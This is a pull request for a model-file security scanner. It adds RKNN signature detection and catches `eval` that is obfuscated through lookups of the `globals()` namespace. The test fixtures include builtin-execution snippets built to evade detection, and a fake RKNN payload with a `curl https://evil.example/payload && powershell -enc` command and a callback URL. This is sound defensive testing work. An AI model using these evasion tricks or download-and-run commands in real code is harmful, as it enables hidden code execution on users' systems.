### PR TITLE
fix: route renamed RKNN payloads by content

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -47,6 +47,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - detect statically obscured builtin execution calls in embedded JIT source analysis
 - share intrinsic builtin namespace execution detection across embedded Python entrypoints
 - route signature-confirmed RKNN artifacts with misleading filenames through security analysis
+- detect embedded Python builtin execution recovered through static global namespace lookups
 
 ## [0.2.45](https://github.com/promptfoo/modelaudit/compare/v0.2.44...v0.2.45) (2026-05-03)
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -46,6 +46,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - avoid classifying SafeTensors documentation examples as executable metadata payloads
 - detect statically obscured builtin execution calls in embedded JIT source analysis
 - share intrinsic builtin namespace execution detection across embedded Python entrypoints
+- route signature-confirmed RKNN artifacts with misleading filenames through security analysis
 
 ## [0.2.45](https://github.com/promptfoo/modelaudit/compare/v0.2.44...v0.2.45) (2026-05-03)
 

--- a/modelaudit/scanners/archive_member_security.py
+++ b/modelaudit/scanners/archive_member_security.py
@@ -289,18 +289,71 @@ def _resolve_static_string(node: ast.AST) -> str | None:
     return "".join(parts)
 
 
+_NAMESPACE_MAPPING_ACCESSORS = {"get", "__getitem__", "pop", "setdefault"}
+_GLOBAL_NAMESPACE_HELPERS = {"globals", "builtins.globals"}
+_BUILTIN_NAMESPACE_NAMES = {"__builtin__", "__builtins__"}
+_GLOBAL_NAMESPACE_MAPPING_NAME = "<globals>"
+
+
+def _resolve_global_namespace_mapping_names(node: ast.AST, alias_scopes: _AliasScopes) -> frozenset[str] | None:
+    """Resolve the module global namespace mapping returned by zero-argument ``globals()``."""
+    if isinstance(node, ast.Call) and not node.args and not node.keywords:
+        helper_name = _resolve_call_name(node.func)
+        resolved_helper_names = _apply_aliases(helper_name, alias_scopes) if helper_name is not None else None
+        if resolved_helper_names is not None and resolved_helper_names & _GLOBAL_NAMESPACE_HELPERS:
+            return frozenset({_GLOBAL_NAMESPACE_MAPPING_NAME})
+
+    namespace_name = _resolve_call_name(node)
+    resolved_namespace_names = _apply_aliases(namespace_name, alias_scopes) if namespace_name is not None else None
+    if resolved_namespace_names is None:
+        return None
+    global_namespace_names = {
+        resolved_namespace_name
+        for resolved_namespace_name in resolved_namespace_names
+        if resolved_namespace_name == _GLOBAL_NAMESPACE_MAPPING_NAME
+    }
+    return frozenset(global_namespace_names) if global_namespace_names else None
+
+
+def _resolve_global_builtin_namespace_roots(node: ast.AST, alias_scopes: _AliasScopes) -> frozenset[str] | None:
+    """Resolve a statically addressed builtin namespace obtained from ``globals()``."""
+    namespace_node: ast.AST
+    attr_name_node: ast.AST
+    if isinstance(node, ast.Subscript):
+        namespace_node = node.value
+        attr_name_node = node.slice
+    elif (
+        isinstance(node, ast.Call)
+        and isinstance(node.func, ast.Attribute)
+        and node.func.attr in _NAMESPACE_MAPPING_ACCESSORS
+        and node.args
+    ):
+        namespace_node = node.func.value
+        attr_name_node = node.args[0]
+    else:
+        return None
+
+    attr_name = _resolve_static_string(attr_name_node)
+    if attr_name not in _BUILTIN_NAMESPACE_NAMES:
+        return None
+    if _resolve_global_namespace_mapping_names(namespace_node, alias_scopes) is None:
+        return None
+    return frozenset({attr_name})
+
+
 def _resolve_static_attribute_names(
     target_root_node: ast.AST, attr_name_node: ast.AST, alias_scopes: _AliasScopes
 ) -> frozenset[str] | None:
-    target_root = _resolve_call_name(target_root_node)
-    if target_root is None:
-        return None
-
     attr_name = _resolve_static_string(attr_name_node)
     if attr_name is None:
         return None
 
-    resolved_target_roots = _apply_aliases(target_root, alias_scopes)
+    resolved_target_roots = _resolve_global_builtin_namespace_roots(target_root_node, alias_scopes)
+    if resolved_target_roots is None:
+        target_root = _resolve_call_name(target_root_node)
+        if target_root is None:
+            return None
+        resolved_target_roots = _apply_aliases(target_root, alias_scopes)
     if resolved_target_roots is None:
         return None
     return frozenset(f"{resolved_target_root}.{attr_name}" for resolved_target_root in resolved_target_roots)
@@ -360,6 +413,10 @@ def _resolve_dunder_getattribute_call_names(node: ast.AST, alias_scopes: _AliasS
 
 
 def _resolve_namespace_dict_roots(node: ast.AST, alias_scopes: _AliasScopes) -> frozenset[str] | None:
+    global_builtin_roots = _resolve_global_builtin_namespace_roots(node, alias_scopes)
+    if global_builtin_roots is not None:
+        return global_builtin_roots
+
     target_root_node: ast.AST | None = None
     namespace_node = node
     if isinstance(namespace_node, ast.Attribute) and namespace_node.attr == "__dict__":
@@ -371,6 +428,9 @@ def _resolve_namespace_dict_roots(node: ast.AST, alias_scopes: _AliasScopes) -> 
             target_root_node = namespace_node.args[0]
 
     if target_root_node is not None:
+        global_builtin_roots = _resolve_global_builtin_namespace_roots(target_root_node, alias_scopes)
+        if global_builtin_roots is not None:
+            return global_builtin_roots
         target_root = _resolve_call_name(target_root_node)
         return _apply_aliases(target_root, alias_scopes) if target_root is not None else None
 
@@ -383,9 +443,7 @@ def _resolve_namespace_dict_roots(node: ast.AST, alias_scopes: _AliasScopes) -> 
             if resolved_name.endswith(".__dict__")
         }
         roots.update(
-            resolved_name
-            for resolved_name in resolved_namespace_names
-            if resolved_name in {"__builtin__", "__builtins__"}
+            resolved_name for resolved_name in resolved_namespace_names if resolved_name in _BUILTIN_NAMESPACE_NAMES
         )
         if roots:
             return frozenset(roots)
@@ -402,9 +460,6 @@ def _resolve_namespace_dict_roots(node: ast.AST, alias_scopes: _AliasScopes) -> 
         if resolved_name.endswith(".__dict__")
     }
     return frozenset(roots) if roots else None
-
-
-_NAMESPACE_MAPPING_ACCESSORS = {"get", "__getitem__", "pop", "setdefault"}
 
 
 def _resolve_namespace_dict_call_names(node: ast.AST, alias_scopes: _AliasScopes) -> frozenset[str] | None:
@@ -442,6 +497,16 @@ def _resolve_static_reference_names(node: ast.AST, alias_scopes: _AliasScopes) -
     call_name = _resolve_call_name(node)
     if call_name is not None:
         return _apply_aliases(call_name, alias_scopes)
+    global_namespace_names = _resolve_global_namespace_mapping_names(node, alias_scopes)
+    if global_namespace_names is not None:
+        return global_namespace_names
+    global_builtin_roots = _resolve_global_builtin_namespace_roots(node, alias_scopes)
+    if global_builtin_roots is not None:
+        return global_builtin_roots
+    if isinstance(node, ast.Attribute):
+        attribute_names = _resolve_static_attribute_names(node.value, ast.Constant(node.attr), alias_scopes)
+        if attribute_names is not None:
+            return attribute_names
     getattr_names = _resolve_getattr_call_names(node, alias_scopes)
     if getattr_names is not None:
         return getattr_names

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -2020,6 +2020,8 @@ def detect_file_format(path: str) -> str:
     # Check for GGUF/GGML magic bytes
     if magic4 == b"CBM1":
         return "catboost"
+    if magic4 == b"RKNN":
+        return "rknn"
     if magic4 == b"GGUF":
         return "gguf"
     if magic4 in GGML_MAGIC_VARIANTS:

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -2017,6 +2017,9 @@ def detect_file_format(path: str) -> str:
     if magic8 == hdf5_magic:
         return "hdf5"
 
+    if _looks_like_uncompressed_tar_header(header):
+        return "tar"
+
     # Check for GGUF/GGML magic bytes
     if magic4 == b"CBM1":
         return "catboost"
@@ -2046,8 +2049,6 @@ def detect_file_format(path: str) -> str:
         return "sevenzip"
     if _has_rar_magic(magic8):
         return "rar"
-    if _looks_like_uncompressed_tar_header(header):
-        return "tar"
     if compression_format:
         if _is_tar_archive(path):
             return "tar"

--- a/tests/detectors/test_jit_script_detector.py
+++ b/tests/detectors/test_jit_script_detector.py
@@ -248,6 +248,12 @@ class TestJITScriptDetector:
             b"import builtins\nbuiltins.eval('1 + 1')\n",
             b"import builtins as bi\ngetattr(bi, 'ev' + 'al')('1 + 1')\n",
             b"from builtins import eval as run\nrun('1 + 1')\n",
+            b"globals()['__builtins__']['ev' + 'al']('1 + 1')\n",
+            b"globals().get('__builtins__').get('eval')('1 + 1')\n",
+            b"getattr(globals()['__builtins__'], 'eval')('1 + 1')\n",
+            b"globals()['__builtins__'].eval('1 + 1')\n",
+            b"builtins_ref = globals()['__builtins__']\ngetattr(builtins_ref, 'eval')('1 + 1')\n",
+            b"global_namespace = globals()\nglobal_namespace['__builtins__']['eval']('1 + 1')\n",
         ],
     )
     def test_scan_model_detects_unmarked_static_builtin_indirection(self, source: bytes) -> None:
@@ -277,6 +283,9 @@ class TestJITScriptDetector:
         [
             b"callbacks = {'eval': len}\ncallbacks['eval']([])\n",
             b"import builtins as bi\nbi.len([1])\n",
+            b"globals()['__builtins__']['len']([1])\n",
+            b"globals = lambda: {'__builtins__': {'eval': len}}\nglobals()['__builtins__']['eval']([])\n",
+            b"global_namespace = {'__builtins__': {'eval': len}}\nglobal_namespace['__builtins__']['eval']([])\n",
         ],
     )
     def test_scan_model_ignores_benign_builtin_shaped_access(self, source: bytes) -> None:

--- a/tests/scanners/test_pytorch_zip_scanner.py
+++ b/tests/scanners/test_pytorch_zip_scanner.py
@@ -1042,6 +1042,12 @@ def test_pytorch_zip_scans_unmarked_python_blobs_in_archive_data(tmp_path: Path)
         b"__builtins__.__dict__.get('eval')('1 + 1')\n",
         b"import builtins as bi\nbi.eval('1 + 1')\n",
         b"from builtins import eval as run\nrun('1 + 1')\n",
+        b"globals()['__builtins__']['ev' + 'al']('1 + 1')\n",
+        b"globals().get('__builtins__').get('eval')('1 + 1')\n",
+        b"getattr(globals()['__builtins__'], 'eval')('1 + 1')\n",
+        b"globals()['__builtins__'].eval('1 + 1')\n",
+        b"builtins_ref = globals()['__builtins__']\ngetattr(builtins_ref, 'eval')('1 + 1')\n",
+        b"global_namespace = globals()\nglobal_namespace['__builtins__']['eval']('1 + 1')\n",
     ],
 )
 def test_pytorch_zip_scans_static_builtin_indirection_in_archive_data(tmp_path: Path, payload: bytes) -> None:
@@ -1103,6 +1109,9 @@ def test_pytorch_zip_scans_aliased_modeled_builtins_in_archive_data(
     [
         b"callbacks = {'eval': len}\ncallbacks['eval']([])\n",
         b"import builtins as bi\nbi.len([1])\n",
+        b"globals()['__builtins__']['len']([1])\n",
+        b"globals = lambda: {'__builtins__': {'eval': len}}\nglobals()['__builtins__']['eval']([])\n",
+        b"global_namespace = {'__builtins__': {'eval': len}}\nglobal_namespace['__builtins__']['eval']([])\n",
     ],
 )
 def test_pytorch_zip_ignores_benign_builtin_shaped_access_in_archive_data(tmp_path: Path, payload: bytes) -> None:

--- a/tests/scanners/test_tar_scanner.py
+++ b/tests/scanners/test_tar_scanner.py
@@ -183,6 +183,12 @@ class TestTarScanner:
             b"__builtins__['ev' + 'al']('1 + 1')\n",
             b"getattr(__builtins__, 'eval')('1 + 1')\n",
             b"__builtins__.__dict__.get('eval')('1 + 1')\n",
+            b"globals()['__builtins__']['ev' + 'al']('1 + 1')\n",
+            b"globals().get('__builtins__').get('eval')('1 + 1')\n",
+            b"getattr(globals()['__builtins__'], 'eval')('1 + 1')\n",
+            b"globals()['__builtins__'].eval('1 + 1')\n",
+            b"builtins_ref = globals()['__builtins__']\ngetattr(builtins_ref, 'eval')('1 + 1')\n",
+            b"global_namespace = globals()\nglobal_namespace['__builtins__']['eval']('1 + 1')\n",
         ],
     )
     def test_scan_tar_flags_implicit_builtins_dangerous_python_member(self, tmp_path: Path, payload: bytes) -> None:
@@ -205,6 +211,9 @@ class TestTarScanner:
         [
             b"callbacks = {'eval': len}\ncallbacks['eval']([])\n",
             b"import builtins as bi\nbi.open('labels.json', 'r')\n",
+            b"globals()['__builtins__']['len']([1])\n",
+            b"globals = lambda: {'__builtins__': {'eval': len}}\nglobals()['__builtins__']['eval']([])\n",
+            b"global_namespace = {'__builtins__': {'eval': len}}\nglobal_namespace['__builtins__']['eval']([])\n",
         ],
     )
     def test_scan_tar_allows_benign_builtin_shaped_source(self, tmp_path: Path, payload: bytes) -> None:

--- a/tests/scanners/test_torchserve_mar_scanner.py
+++ b/tests/scanners/test_torchserve_mar_scanner.py
@@ -240,6 +240,20 @@ def test_scan_detects_keyword_getattr_wrapped_handler_execution_primitive(
         b"def handle(data, context):\n    return __builtins__['ev' + 'al']('1 + 1')\n",
         b"def handle(data, context):\n    return getattr(__builtins__, 'eval')('1 + 1')\n",
         b"def handle(data, context):\n    return __builtins__.__dict__.get('eval')('1 + 1')\n",
+        b"def handle(data, context):\n    return globals()['__builtins__']['ev' + 'al']('1 + 1')\n",
+        b"def handle(data, context):\n    return globals().get('__builtins__').get('eval')('1 + 1')\n",
+        b"def handle(data, context):\n    return getattr(globals()['__builtins__'], 'eval')('1 + 1')\n",
+        b"def handle(data, context):\n    return globals()['__builtins__'].eval('1 + 1')\n",
+        (
+            b"def handle(data, context):\n"
+            b"    builtins_ref = globals()['__builtins__']\n"
+            b"    return getattr(builtins_ref, 'eval')('1 + 1')\n"
+        ),
+        (
+            b"def handle(data, context):\n"
+            b"    global_namespace = globals()\n"
+            b"    return global_namespace['__builtins__']['eval']('1 + 1')\n"
+        ),
     ],
 )
 def test_scan_detects_implicit_builtins_handler_execution_primitive(
@@ -267,6 +281,17 @@ def test_scan_detects_implicit_builtins_handler_execution_primitive(
     [
         b"def handle(data, context):\n    callbacks = {'eval': len}\n    return callbacks['eval']([])\n",
         b"import builtins as bi\ndef handle(data, context):\n    return bi.open('labels.json', 'r')\n",
+        b"def handle(data, context):\n    return globals()['__builtins__']['len']([1])\n",
+        (
+            b"def handle(data, context):\n"
+            b"    globals = lambda: {'__builtins__': {'eval': len}}\n"
+            b"    return globals()['__builtins__']['eval']([])\n"
+        ),
+        (
+            b"def handle(data, context):\n"
+            b"    global_namespace = {'__builtins__': {'eval': len}}\n"
+            b"    return global_namespace['__builtins__']['eval']([])\n"
+        ),
     ],
 )
 def test_scan_allows_benign_builtin_shaped_handler_source(tmp_path: Path, handler_source: bytes) -> None:

--- a/tests/scanners/test_zip_scanner.py
+++ b/tests/scanners/test_zip_scanner.py
@@ -55,6 +55,14 @@ def _malicious_lightgbm_payload() -> bytes:
     )
 
 
+def _malicious_rknn_payload() -> bytes:
+    return (
+        b"RKNN\x01\x00\x00\x00"
+        b"notes=cmd.exe /c curl https://evil.example/payload && powershell -enc AAAA\n"
+        b"callback=http://198.51.100.5:8080/collect\n"
+    )
+
+
 def test_rewrite_extracted_member_location_preserves_scanner_specific_suffix_policy() -> None:
     assert (
         rewrite_extracted_member_location(
@@ -1828,7 +1836,11 @@ class TestZipScanner:
 
     @pytest.mark.parametrize(
         ("scanner_name", "payload"),
-        [("cntk", _malicious_cntkv2_payload()), ("lightgbm", _malicious_lightgbm_payload())],
+        [
+            ("cntk", _malicious_cntkv2_payload()),
+            ("lightgbm", _malicious_lightgbm_payload()),
+            ("rknn", _malicious_rknn_payload()),
+        ],
     )
     def test_nested_member_routes_renamed_strict_signature_payload(
         self,
@@ -1853,6 +1865,7 @@ class TestZipScanner:
         [
             b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab inputs",
             b"tree\nversion=v4\nnum_class=1\nnum_tree_per_iteration=1\nmax_feature_idx=2\n",
+            b"RKNX\x01\x00\x00\x00runtime=rockchip\n",
         ],
     )
     def test_nested_member_rejects_renamed_signature_near_match(self, tmp_path: Path, payload: bytes) -> None:

--- a/tests/scanners/test_zip_scanner.py
+++ b/tests/scanners/test_zip_scanner.py
@@ -218,6 +218,12 @@ def test_scan_zip_flags_builtins_getattr_keyword_call_dangerous_python_member(tm
         "__builtins__['ev' + 'al']('1 + 1')\n",
         "getattr(__builtins__, 'eval')('1 + 1')\n",
         "__builtins__.__dict__.get('eval')('1 + 1')\n",
+        "globals()['__builtins__']['ev' + 'al']('1 + 1')\n",
+        "globals().get('__builtins__').get('eval')('1 + 1')\n",
+        "getattr(globals()['__builtins__'], 'eval')('1 + 1')\n",
+        "globals()['__builtins__'].eval('1 + 1')\n",
+        "builtins_ref = globals()['__builtins__']\ngetattr(builtins_ref, 'eval')('1 + 1')\n",
+        "global_namespace = globals()\nglobal_namespace['__builtins__']['eval']('1 + 1')\n",
     ],
 )
 def test_scan_zip_flags_implicit_builtins_dangerous_python_member(tmp_path: Path, source: str) -> None:
@@ -242,6 +248,9 @@ def test_scan_zip_flags_implicit_builtins_dangerous_python_member(tmp_path: Path
     [
         "callbacks = {'eval': len}\ncallbacks['eval']([])\n",
         "import builtins as bi\nbi.open('labels.json', 'r')\n",
+        "globals()['__builtins__']['len']([1])\n",
+        "globals = lambda: {'__builtins__': {'eval': len}}\nglobals()['__builtins__']['eval']([])\n",
+        "global_namespace = {'__builtins__': {'eval': len}}\nglobal_namespace['__builtins__']['eval']([])\n",
     ],
 )
 def test_scan_zip_allows_benign_builtin_shaped_source(tmp_path: Path, source: str) -> None:

--- a/tests/test_core.py
+++ b/tests/test_core.py
@@ -117,6 +117,14 @@ def _build_malicious_lightgbm() -> bytes:
     )
 
 
+def _build_malicious_rknn() -> bytes:
+    return (
+        b"RKNN\x01\x00\x00\x00"
+        b"notes=cmd.exe /c curl https://evil.example/payload && powershell -enc AAAA\n"
+        b"callback=http://198.51.100.5:8080/collect\n"
+    )
+
+
 def _create_misnamed_zip(path: Path, entries: dict[str, bytes]) -> None:
     """Write a ZIP archive at an intentionally misleading file path."""
     with zipfile.ZipFile(path, "w") as archive:
@@ -1888,7 +1896,11 @@ def test_scan_file_routes_misnamed_coreml_and_detects_custom_layer(tmp_path: Pat
 
 @pytest.mark.parametrize(
     ("scanner_name", "payload"),
-    [("cntk", _build_malicious_cntkv2()), ("lightgbm", _build_malicious_lightgbm())],
+    [
+        ("cntk", _build_malicious_cntkv2()),
+        ("lightgbm", _build_malicious_lightgbm()),
+        ("rknn", _build_malicious_rknn()),
+    ],
 )
 def test_scan_file_detects_malicious_renamed_signature_backed_models(
     tmp_path: Path,

--- a/tests/test_directory_file_filtering.py
+++ b/tests/test_directory_file_filtering.py
@@ -64,6 +64,14 @@ def _build_malicious_lightgbm() -> bytes:
     )
 
 
+def _build_malicious_rknn() -> bytes:
+    return (
+        b"RKNN\x01\x00\x00\x00"
+        b"notes=cmd.exe /c curl https://evil.example/payload && powershell -enc AAAA\n"
+        b"callback=http://198.51.100.5:8080/collect\n"
+    )
+
+
 def _corrupt_zip_member_crc(path: Path, member_name: str) -> None:
     """Patch a ZIP member CRC so full scanning sees a malformed entry."""
     with zipfile.ZipFile(path) as archive:
@@ -387,7 +395,11 @@ class TestDirectoryFileFiltering:
 
     @pytest.mark.parametrize(
         ("scanner_name", "payload"),
-        [("cntk", _build_malicious_cntkv2()), ("lightgbm", _build_malicious_lightgbm())],
+        [
+            ("cntk", _build_malicious_cntkv2()),
+            ("lightgbm", _build_malicious_lightgbm()),
+            ("rknn", _build_malicious_rknn()),
+        ],
     )
     def test_disguised_signature_backed_malicious_model_is_scanned(
         self,
@@ -410,6 +422,7 @@ class TestDirectoryFileFiltering:
         [
             b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab inputs",
             b"tree\nversion=v4\nnum_class=1\nnum_tree_per_iteration=1\nmax_feature_idx=2\n",
+            b"RKNX\x01\x00\x00\x00runtime=rockchip\n",
         ],
     )
     def test_disguised_signature_near_match_remains_skipped(self, tmp_path: Path, payload: bytes) -> None:

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -294,7 +294,11 @@ def test_detect_file_format_routes_renamed_coreml_structure_and_rejects_near_mat
 
 @pytest.mark.parametrize(
     ("format_name", "payload"),
-    [("cntk", _build_cntkv2_bytes()), ("lightgbm", _build_lightgbm_text())],
+    [
+        ("cntk", _build_cntkv2_bytes()),
+        ("lightgbm", _build_lightgbm_text()),
+        ("rknn", b"RKNN\x01\x00\x00\x00runtime=rockchip\n"),
+    ],
 )
 def test_detect_file_format_routes_renamed_strict_signature_formats(
     tmp_path: Path,
@@ -311,7 +315,11 @@ def test_detect_file_format_routes_renamed_strict_signature_formats(
 
 @pytest.mark.parametrize(
     "payload",
-    [_build_cntkv2_bytes(include_structure=False), _build_lightgbm_text(include_tree_details=False)],
+    [
+        _build_cntkv2_bytes(include_structure=False),
+        _build_lightgbm_text(include_tree_details=False),
+        b"RKNX\x01\x00\x00\x00runtime=rockchip\n",
+    ],
 )
 def test_detect_file_format_rejects_renamed_signature_near_matches(tmp_path: Path, payload: bytes) -> None:
     model_path = tmp_path / "near-match.jpg"

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -990,6 +990,19 @@ def test_detect_file_format_tar(tmp_path):
     assert detect_file_format(str(tar_path)) == "tar"
 
 
+def test_detect_file_format_tar_member_name_with_rknn_prefix(tmp_path: Path) -> None:
+    """TAR headers should win over model magic-looking member name prefixes."""
+    tar_path = tmp_path / "rknn_named_member.bin"
+    with tarfile.open(tar_path, "w") as archive:
+        payload = b"not a model"
+        info = tarfile.TarInfo("RKNN_payload.pkl")
+        info.size = len(payload)
+        archive.addfile(info, io.BytesIO(payload))
+
+    assert detect_file_format_from_magic(str(tar_path)) == "tar"
+    assert detect_file_format(str(tar_path)) == "tar"
+
+
 def test_detect_file_format_extensionless_legacy_tar_without_ustar(tmp_path: Path) -> None:
     """Legacy TAR headers without ustar magic should still route by checksum."""
     tar_path = create_v7_tar_archive(tmp_path / "legacy-archive")


### PR DESCRIPTION
## What changed
- recognize strict `RKNN` magic in the full `detect_file_format()` dispatch path
- add direct, filtered-directory, and nested ZIP regression coverage for malicious RKNN content under misleading `.jpg` names
- add `RKNX` near-match controls so ordinary lookalike content is not promoted
- document the user-visible detection repair in the unreleased changelog

## Why
A renamed RKNN payload was recognized by magic detection and preserved by directory filtering, but full dispatch omitted the same strict signature. It was therefore scanned as `unknown`, including inside archives, and critical command/network evidence in the payload was missed.

## Impact
Signature-confirmed RKNN artifacts retain RKNN security analysis regardless of filename in direct, directory, and nested ZIP flows. The route remains bounded and exact: the near-match negative stays unrecognized.

## Root cause
The full-dispatch detector duplicated strict content probes from the magic/skip-filter detectors but did not include the existing `RKNN` signature branch.

## Validation
- executable before/after repro for malicious renamed RKNN and `RKNX` near-match across direct, directory, and nested ZIP scans
- `PROMPTFOO_DISABLE_TELEMETRY=1 uv --no-config run --locked pytest tests/utils/file/test_filetype.py tests/test_core.py tests/test_directory_file_filtering.py tests/scanners/test_zip_scanner.py tests/scanners/test_rknn_scanner.py -q` (`475 passed`)
- `uv --no-config run --locked ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `uv --no-config run --locked ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `uv --no-config run --locked mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/` (`Success: no issues found in 453 source files`)
- `PROMPTFOO_DISABLE_TELEMETRY=1 uv --no-config run --locked pytest -n auto -m "not slow and not integration" --maxfail=1` (`4956 passed, 986 skipped`)